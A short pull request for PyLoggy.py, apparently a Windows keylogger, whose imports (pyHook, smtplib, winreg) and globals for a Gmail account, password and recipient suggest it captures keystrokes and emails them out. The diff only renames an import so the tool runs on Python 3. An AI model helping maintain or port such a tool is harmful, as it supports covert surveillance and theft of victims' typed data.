### PR TITLE
PyLoggy.py

### DIFF
--- a/PyLoggy.py
+++ b/PyLoggy.py
@@ -15,7 +15,7 @@ d8'   .8P 88.  .88 88.  .88 88    88 88   88   88.  .88
 import sys
 import win32api,pythoncom
 import pyHook,os,time,random,smtplib,string,base64
-from _winreg import *
+from winreg import * #Changed _winreg to winreg and made it work.
 
 global t,start_time,pics_names,yourgmail,yourgmailpass,sendto,interval
 


### PR DESCRIPTION
changed _winreg to winreg in the import section. Earlier it didn't work on python 3.7.2 after this change it does.